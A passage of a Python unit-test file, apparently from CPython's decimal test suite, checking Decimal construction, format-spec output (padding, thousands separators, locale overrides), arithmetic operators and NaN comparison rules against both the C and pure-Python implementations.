        d = Decimal( (0, (4, 5, 3, 4), -2) )
        self.assertEqual(str(d), '45.34')

        #weird
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')

        #inf
        d = Decimal( (0, (), "F") )
        self.assertEqual(str(d), 'Infinity')

        #wrong number of items
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )

        #bad sign
        self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))

        #bad exp
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )

        #bad coefficients
        self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )

    def test_explicit_from_list(self):
        # Lists (and mixed list/tuple nesting) are accepted like tuples.
        Decimal = self.decimal.Decimal

        d = Decimal([0, [0], 0])
        self.assertEqual(str(d), '0')

        d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
        self.assertEqual(str(d), '-4.34913534E-17')

    def test_explicit_from_bool(self):
        Decimal = self.decimal.Decimal

        self.assertIs(bool(Decimal(0)), False)
        self.assertIs(bool(Decimal(1)), True)
        self.assertEqual(Decimal(False), Decimal(0))
        self.assertEqual(Decimal(True), Decimal(1))

    def test_explicit_from_Decimal(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')

        #very large positive
        d = Decimal(500000123)
        e = Decimal(d)
        self.assertEqual(str(e), '500000123')

        #negative
        d = Decimal(-45)
        e = Decimal(d)
        self.assertEqual(str(e), '-45')

        #zero
        d = Decimal(0)
        e = Decimal(d)
        self.assertEqual(str(e), '0')

    @requires_IEEE_754
    def test_explicit_from_float(self):

        Decimal = self.decimal.Decimal

        r = Decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertTrue(Decimal(float('nan')).is_qnan())
        self.assertTrue(Decimal(float('inf')).is_infinite())
        self.assertTrue(Decimal(float('-inf')).is_infinite())
        self.assertEqual(str(Decimal(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(Decimal(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(Decimal(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertEqual(str(Decimal(float('-0.0'))),
                         str(Decimal('-0')))
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(Decimal(x))) # roundtrip

    def test_explicit_context_create_decimal(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        Rounded = self.decimal.Rounded

        nc = copy.copy(self.decimal.getcontext())
        nc.prec = 3

        # empty
        d = Decimal()
        self.assertEqual(str(d), '0')
        d = nc.create_decimal()
        self.assertEqual(str(d), '0')

        # from None
        self.assertRaises(TypeError, nc.create_decimal, None)

        # from int
        d = nc.create_decimal(456)
        self.assertIsInstance(d, Decimal)
        self.assertEqual(nc.create_decimal(45678),
                         nc.create_decimal('457E+2'))

        # from string
        d = Decimal('456789')
        self.assertEqual(str(d), '456789')
        d = nc.create_decimal('456789')
        self.assertEqual(str(d), '4.57E+5')
        # leading and trailing whitespace should result in a NaN;
        # spaces are already checked in Cowlishaw's test-suite, so
        # here we just check that a trailing newline results in a NaN
        self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')

        # from tuples
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')
        d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.35E-17')

        # from Decimal
        prevdec = Decimal(500000123)
        d = Decimal(prevdec)
        self.assertEqual(str(d), '500000123')
        d = nc.create_decimal(prevdec)
        self.assertEqual(str(d), '5.00E+8')

        # more integers
        nc.prec = 28
        nc.traps[InvalidOperation] = True

        for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
                  2**31-1, 2**31, 2**63-1, 2**63]:
            d = nc.create_decimal(v)
            self.assertTrue(isinstance(d, Decimal))
            self.assertEqual(int(d), v)

        nc.prec = 3
        nc.traps[Rounded] = True
        self.assertRaises(Rounded, nc.create_decimal, 1234)

        # from string
        nc.prec = 28
        self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
        self.assertEqual(str(nc.create_decimal('45')), '45')
        self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
        self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')

        # invalid arguments
        self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
        self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
        self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")

        # no whitespace and underscore stripping is done with this method
        self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
        self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")

        # too many NaN payload digits
        nc.prec = 3
        self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
        self.assertRaises(InvalidOperation, nc.create_decimal,
                          Decimal('NaN12345'))

        nc.traps[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

        nc.flags[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

    def test_explicit_context_create_from_float(self):

        Decimal = self.decimal.Decimal

        nc = self.decimal.Context()
        r = nc.create_decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r), '0.1000000000000000055511151231')
        self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
        self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
        self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
        self.assertEqual(str(nc.create_decimal(float('nan'))),
                         str(nc.create_decimal('NaN')))
        self.assertEqual(str(nc.create_decimal(float('inf'))),
                         str(nc.create_decimal('Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-inf'))),
                         str(nc.create_decimal('-Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-0.0'))),
                         str(nc.create_decimal('-0')))
        nc.prec = 100
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip

    def test_unicode_digits(self):
        # Non-ASCII decimal digits and payloads are accepted.
        Decimal = self.decimal.Decimal

        test_values = {
            '\uff11': '1',
            '\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
            '-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
            }
        for input, expected in test_values.items():
            self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
    # Explicit-construction tests against the C accelerator module.
    decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
    # Explicit-construction tests against the pure-Python module.
    decimal = P
class ImplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Implicit Construction cases of Decimal.

    `eval` is used deliberately so TypeErrors are raised at evaluation
    time rather than at test-collection time.
    '''

    def test_implicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())

    def test_implicit_from_int(self):
        Decimal = self.decimal.Decimal

        #normal
        self.assertEqual(str(Decimal(5) + 45), '50')
        #exceeding precision
        self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))

    def test_implicit_from_string(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())

    def test_implicit_from_float(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())

    def test_implicit_from_Decimal(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))

    def test_rop(self):
        Decimal = self.decimal.Decimal

        # Allow other classes to be trained to interact with Decimals
        class E:
            def __divmod__(self, other):
                return 'divmod ' + str(other)
            def __rdivmod__(self, other):
                return str(other) + ' rdivmod'
            def __lt__(self, other):
                return 'lt ' + str(other)
            def __gt__(self, other):
                return 'gt ' + str(other)
            def __le__(self, other):
                return 'le ' + str(other)
            def __ge__(self, other):
                return 'ge ' + str(other)
            def __eq__(self, other):
                return 'eq ' + str(other)
            def __ne__(self, other):
                return 'ne ' + str(other)

        self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
        self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
        self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
        self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
        self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
        self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
        self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
        self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')

        # insert operator methods and then exercise them
        oplist = [
            ('+', '__add__', '__radd__'),
            ('-', '__sub__', '__rsub__'),
            ('*', '__mul__', '__rmul__'),
            ('/', '__truediv__', '__rtruediv__'),
            ('%', '__mod__', '__rmod__'),
            ('//', '__floordiv__', '__rfloordiv__'),
            ('**', '__pow__', '__rpow__')
        ]

        # NOTE: the lambdas close over lop/rop late-binding, but they are
        # called (via eval) within the same loop iteration, so each sees
        # the current operator names.
        for sym, lop, rop in oplist:
            setattr(E, lop, lambda self, other: 'str' + lop + str(other))
            setattr(E, rop, lambda self, other: str(other) + rop + 'str')
            self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
                             'str' + lop + '10')
            self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
                             '10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
    # Run the implicit-construction tests against the C implementation.
    decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
    # Run the implicit-construction tests against the pure-Python implementation.
    decimal = P
class FormatTest(unittest.TestCase):
    '''Unit tests for the format function.'''

    def test_formatting(self):
        """__format__ must honour the format mini-language for Decimals.

        BUG FIX: runs of spaces inside several expected strings in the
        alignment/padding section had been collapsed to a single space
        (e.g. format(Decimal('123'), '6') is '   123', not ' 123'),
        which made those assertions fail.  The correct widths are
        restored below.
        """
        Decimal = self.decimal.Decimal

        # triples giving a format, a Decimal, and the expected result
        test_values = [
            ('e', '0E-15', '0e-15'),
            ('e', '2.3E-15', '2.3e-15'),
            ('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
            ('e', '2.30000E-15', '2.30000e-15'),
            ('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
            ('e', '1.5', '1.5e+0'),
            ('e', '0.15', '1.5e-1'),
            ('e', '0.015', '1.5e-2'),
            ('e', '0.0000000000015', '1.5e-12'),
            ('e', '15.0', '1.50e+1'),
            ('e', '-15', '-1.5e+1'),
            ('e', '0', '0e+0'),
            ('e', '0E1', '0e+1'),
            ('e', '0.0', '0e-1'),
            ('e', '0.00', '0e-2'),
            ('.6e', '0E-15', '0.000000e-9'),
            ('.6e', '0', '0.000000e+6'),
            ('.6e', '9.999999', '9.999999e+0'),
            ('.6e', '9.9999999', '1.000000e+1'),
            ('.6e', '-1.23e5', '-1.230000e+5'),
            ('.6e', '1.23456789e-3', '1.234568e-3'),
            ('f', '0', '0'),
            ('f', '0.0', '0.0'),
            ('f', '0E-2', '0.00'),
            ('f', '0.00E-8', '0.0000000000'),
            ('f', '0E1', '0'), # loses exponent information
            ('f', '3.2E1', '32'),
            ('f', '3.2E2', '320'),
            ('f', '3.20E2', '320'),
            ('f', '3.200E2', '320.0'),
            ('f', '3.2E-6', '0.0000032'),
            ('.6f', '0E-15', '0.000000'), # all zeros treated equally
            ('.6f', '0E1', '0.000000'),
            ('.6f', '0', '0.000000'),
            ('.0f', '0', '0'), # no decimal point
            ('.0f', '0e-2', '0'),
            ('.0f', '3.14159265', '3'),
            ('.1f', '3.14159265', '3.1'),
            ('.4f', '3.14159265', '3.1416'),
            ('.6f', '3.14159265', '3.141593'),
            ('.7f', '3.14159265', '3.1415926'), # round-half-even!
            ('.8f', '3.14159265', '3.14159265'),
            ('.9f', '3.14159265', '3.141592650'),

            ('g', '0', '0'),
            ('g', '0.0', '0.0'),
            ('g', '0E1', '0e+1'),
            ('G', '0E1', '0E+1'),
            ('g', '0E-5', '0.00000'),
            ('g', '0E-6', '0.000000'),
            ('g', '0E-7', '0e-7'),
            ('g', '-0E2', '-0e+2'),
            ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
            ('.0n', '3.14159265', '3'), # same for 'n'
            ('.1g', '3.14159265', '3'),
            ('.2g', '3.14159265', '3.1'),
            ('.5g', '3.14159265', '3.1416'),
            ('.7g', '3.14159265', '3.141593'),
            ('.8g', '3.14159265', '3.1415926'), # round-half-even!
            ('.9g', '3.14159265', '3.14159265'),
            ('.10g', '3.14159265', '3.14159265'), # don't pad

            ('%', '0E1', '0%'),
            ('%', '0E0', '0%'),
            ('%', '0E-1', '0%'),
            ('%', '0E-2', '0%'),
            ('%', '0E-3', '0.0%'),
            ('%', '0E-4', '0.00%'),

            ('.3%', '0', '0.000%'), # all zeros treated equally
            ('.3%', '0E10', '0.000%'),
            ('.3%', '0E-10', '0.000%'),
            ('.3%', '2.34', '234.000%'),
            ('.3%', '1.234567', '123.457%'),
            ('.0%', '1.23', '123%'),

            ('e', 'NaN', 'NaN'),
            ('f', '-NaN123', '-NaN123'),
            ('+g', 'NaN456', '+NaN456'),
            ('.3e', 'Inf', 'Infinity'),
            ('.16f', '-Inf', '-Infinity'),
            ('.0g', '-sNaN', '-sNaN'),

            ('', '1.00', '1.00'),

            # test alignment and padding
            ('6', '123', '   123'),
            ('<6', '123', '123   '),
            ('>6', '123', '   123'),
            ('^6', '123', ' 123  '),
            ('=+6', '123', '+  123'),
            ('#<10', 'NaN', 'NaN#######'),
            ('#<10', '-4.3', '-4.3######'),
            ('#<+10', '0.0130', '+0.0130###'),
            ('#< 10', '0.0130', ' 0.0130###'),
            ('@>10', '-Inf', '@-Infinity'),
            ('#>5', '-Inf', '-Infinity'),
            ('?^5', '123', '?123?'),
            ('%^6', '123', '%123%%'),
            (' ^6', '-45.6', '-45.6 '),
            ('/=10', '-45.6', '-/////45.6'),
            ('/=+10', '45.6', '+/////45.6'),
            ('/= 10', '45.6', ' /////45.6'),
            ('\x00=10', '-inf', '-\x00Infinity'),
            ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
            ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
            ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),

            # thousands separator
            (',', '1234567', '1,234,567'),
            (',', '123456', '123,456'),
            (',', '12345', '12,345'),
            (',', '1234', '1,234'),
            (',', '123', '123'),
            (',', '12', '12'),
            (',', '1', '1'),
            (',', '0', '0'),
            (',', '-1234567', '-1,234,567'),
            (',', '-123456', '-123,456'),
            ('7,', '123456', '123,456'),
            ('8,', '123456', ' 123,456'),
            ('08,', '123456', '0,123,456'), # special case: extra 0 needed
            ('+08,', '123456', '+123,456'), # but not if there's a sign
            (' 08,', '123456', ' 123,456'),
            ('08,', '-123456', '-123,456'),
            ('+09,', '123456', '+0,123,456'),
            # ... with fractional part...
            ('07,', '1234.56', '1,234.56'),
            ('08,', '1234.56', '1,234.56'),
            ('09,', '1234.56', '01,234.56'),
            ('010,', '1234.56', '001,234.56'),
            ('011,', '1234.56', '0,001,234.56'),
            ('012,', '1234.56', '0,001,234.56'),
            ('08,.1f', '1234.5', '01,234.5'),
            # no thousands separators in fraction part
            (',', '1.23456789', '1.23456789'),
            (',%', '123.456789', '12,345.6789%'),
            (',e', '123456', '1.23456e+5'),
            (',E', '123456', '1.23456E+5'),

            # issue 6850
            ('a=-7.0', '0.12345', 'aaaa0.1'),

            # issue 22090
            ('<^+15.20%', 'inf', '<<+Infinity%<<<'),
            ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
            ('=10.10%', 'NaN123', '   NaN123%'),
            ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)

        # bytes format argument is rejected
        self.assertRaises(TypeError, Decimal(1).__format__, b'-020')

    def test_n_format(self):
        """'n' formatting must honour localeconv-style overrides."""
        Decimal = self.decimal.Decimal

        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            # The C implementation takes grouping as a string of byte
            # values; the Python implementation takes a list of ints.
            return ''.join([chr(x) for x in lst]) if self.decimal == C else lst

        def get_fmt(x, override=None, fmt='n'):
            # The two implementations spell the localeconv override
            # differently.
            if self.decimal == C:
                return Decimal(x).__format__(fmt, override)
            else:
                return Decimal(x).__format__(fmt, _localeconv=override)

        # Set up some localeconv-like dictionaries
        en_US = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
            }

        fr_FR = {
            'decimal_point' : ',',
            'grouping' : make_grouping([CHAR_MAX]),
            'thousands_sep' : ''
            }

        ru_RU = {
            'decimal_point' : ',',
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : ' '
            }

        crazy = {
            'decimal_point' : '&',
            'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
            'thousands_sep' : '-'
            }

        dotsep_wide = {
            'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
            }

        self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
        self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')

        self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
        self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
        self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
        self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')

        self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
        self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')

        # zero padding
        self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
        self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')

        self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
        self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')

        self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')

        # wide char separator and decimal point
        self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
                         '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')

    @run_with_locale('LC_ALL', 'ps_AF')
    def test_wide_char_separator_decimal_point(self):
        # locale with wide char separator and decimal point
        Decimal = self.decimal.Decimal

        decimal_point = locale.localeconv()['decimal_point']
        thousands_sep = locale.localeconv()['thousands_sep']
        # Skip rather than fail when the platform locale does not
        # actually provide the expected wide characters.
        if decimal_point != '\u066b':
            self.skipTest('inappropriate decimal point separator '
                          '({!a} not {!a})'.format(decimal_point, '\u066b'))
        if thousands_sep != '\u066c':
            self.skipTest('inappropriate thousands separator '
                          '({!a} not {!a})'.format(thousands_sep, '\u066c'))

        self.assertEqual(format(Decimal('100000000.123'), 'n'),
                         '100\u066c000\u066c000\u066b123')

    def test_decimal_from_float_argument_type(self):
        # from_float on a subclass constructs via plain Decimal: the value
        # passed to the subclass __init__ is always a Decimal instance.
        class A(self.decimal.Decimal):
            def __init__(self, a):
                self.a_type = type(a)
        a = A.from_float(42.5)
        self.assertEqual(self.decimal.Decimal, a.a_type)

        a = A.from_float(42)
        self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
    # Run FormatTest against the C implementation of decimal.
    decimal = C
class PyFormatTest(FormatTest):
    # Run FormatTest against the pure-Python implementation of decimal.
    decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
    '''Unit tests for all arithmetic operators, binary and unary.'''

    # Each binary-operator test follows the same pattern:
    # Decimal op Decimal, Decimal op int in both operand orders (checking
    # that the result type stays Decimal), then the augmented-assignment
    # forms.

    def test_addition(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('-11.1')
        d2 = Decimal('22.2')

        #two Decimals
        self.assertEqual(d1+d2, Decimal('11.1'))
        self.assertEqual(d2+d1, Decimal('11.1'))

        #with other type, left
        c = d1 + 5
        self.assertEqual(c, Decimal('-6.1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 + d1
        self.assertEqual(c, Decimal('-6.1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 += d2
        self.assertEqual(d1, Decimal('11.1'))

        #inline with other type
        d1 += 5
        self.assertEqual(d1, Decimal('16.1'))

    def test_subtraction(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('-11.1')
        d2 = Decimal('22.2')

        #two Decimals
        self.assertEqual(d1-d2, Decimal('-33.3'))
        self.assertEqual(d2-d1, Decimal('33.3'))

        #with other type, left
        c = d1 - 5
        self.assertEqual(c, Decimal('-16.1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 - d1
        self.assertEqual(c, Decimal('16.1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 -= d2
        self.assertEqual(d1, Decimal('-33.3'))

        #inline with other type
        d1 -= 5
        self.assertEqual(d1, Decimal('-38.3'))

    def test_multiplication(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('-5')
        d2 = Decimal('3')

        #two Decimals
        self.assertEqual(d1*d2, Decimal('-15'))
        self.assertEqual(d2*d1, Decimal('-15'))

        #with other type, left
        c = d1 * 5
        self.assertEqual(c, Decimal('-25'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 * d1
        self.assertEqual(c, Decimal('-25'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 *= d2
        self.assertEqual(d1, Decimal('-15'))

        #inline with other type
        d1 *= 5
        self.assertEqual(d1, Decimal('-75'))

    def test_division(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('-5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1/d2, Decimal('-2.5'))
        self.assertEqual(d2/d1, Decimal('-0.4'))

        #with other type, left
        c = d1 / 4
        self.assertEqual(c, Decimal('-1.25'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 4 / d1
        self.assertEqual(c, Decimal('-0.8'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 /= d2
        self.assertEqual(d1, Decimal('-2.5'))

        #inline with other type
        d1 /= 4
        self.assertEqual(d1, Decimal('-0.625'))

    def test_floor_division(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1//d2, Decimal('2'))
        self.assertEqual(d2//d1, Decimal('0'))

        #with other type, left
        c = d1 // 4
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 // d1
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 //= d2
        self.assertEqual(d1, Decimal('2'))

        #inline with other type
        d1 //= 2
        self.assertEqual(d1, Decimal('1'))

    def test_powering(self):
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1**d2, Decimal('25'))
        self.assertEqual(d2**d1, Decimal('32'))

        #with other type, left
        c = d1 ** 4
        self.assertEqual(c, Decimal('625'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 ** d1
        self.assertEqual(c, Decimal('16807'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 **= d2
        self.assertEqual(d1, Decimal('25'))

        #inline with other type
        d1 **= 4
        self.assertEqual(d1, Decimal('390625'))

    def test_module(self):
        # Modulo (%) operator.
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1%d2, Decimal('1'))
        self.assertEqual(d2%d1, Decimal('2'))

        #with other type, left
        c = d1 % 4
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 % d1
        self.assertEqual(c, Decimal('2'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 %= d2
        self.assertEqual(d1, Decimal('1'))

        #inline with other type
        d1 %= 4
        self.assertEqual(d1, Decimal('1'))

    def test_floor_div_module(self):
        # divmod() must return a pair of Decimals for every operand mix.
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        (p, q) = divmod(d1, d2)
        self.assertEqual(p, Decimal('2'))
        self.assertEqual(q, Decimal('1'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

        #with other type, left
        (p, q) = divmod(d1, 4)
        self.assertEqual(p, Decimal('1'))
        self.assertEqual(q, Decimal('1'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

        #with other type, right
        (p, q) = divmod(7, d1)
        self.assertEqual(p, Decimal('1'))
        self.assertEqual(q, Decimal('2'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

    def test_unary_operators(self):
        Decimal = self.decimal.Decimal

        self.assertEqual(+Decimal(45), Decimal(+45))           #  +
        self.assertEqual(-Decimal(45), Decimal(-45))           #  -
        self.assertEqual(abs(Decimal(45)), abs(Decimal(-45)))  # abs

    def test_nan_comparisons(self):
        # comparisons involving signaling nans signal InvalidOperation

        # order comparisons (<, <=, >, >=) involving only quiet nans
        # also signal InvalidOperation

        # equality comparisons (==, !=) involving only quiet nans
        # don't signal, but return False or True respectively.
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        localcontext = self.decimal.localcontext

        n = Decimal('NaN')
        s = Decimal('sNaN')
        i = Decimal('Inf')
        f = Decimal('2')

        qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
        snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
        order_ops = operator.lt, operator.le, operator.gt, operator.ge
        equality_ops = operator.eq, operator.ne

        # results when InvalidOperation is not trapped
        for x, y in qnan_pairs + snan_pairs:
            for op in order_ops + equality_ops:
                got = op(x, y)
                # only != yields True for NaN operands; everything else
                # is False
                expected = True if op is operator.ne else False
                self.assertIs(expected, got,
                              "expected {0!r} for operator.{1}({2!r}, {3!r}); "
                              "got {4!r}".format(
                                  expected, op.__name__, x, y, got))

        # repeat the above, but this time trap the InvalidOperation
        with localcontext() as ctx:
            ctx.traps[InvalidOperation] = 1

            for x, y in qnan_pairs:
                for op in equality_ops:
                    got = op(x, y)
                    expected = True if op is operator.ne else False
                    self.assertIs(expected, got,
                                  "expected {0!r} for "
                                  "operator.{1}({2!r}, {3!r}); "
                                  "got {4!r}".format(
                                      expected, op.__name__, x, y, got))

            for x, y in snan_pairs:
                for op in equality_ops:
                    # signaling NaNs raise even for ==/!= when trapped
                    self.assertRaises(InvalidOperation, operator.eq, x, y)
                    self.assertRaises(InvalidOperation, operator.ne, x, y)

            for x, y in qnan_pairs + snan_pairs:
                for op in order_ops:
                    self.assertRaises(InvalidOperation, op, x, y)

    def test_copy_sign(self):
        Decimal = self.decimal.Decimal

        d = Decimal(1).copy_sign(Decimal(-2))
        self.assertEqual(Decimal(1).copy_sign(-2), d)
        # copy_sign requires a numeric operand, not a string
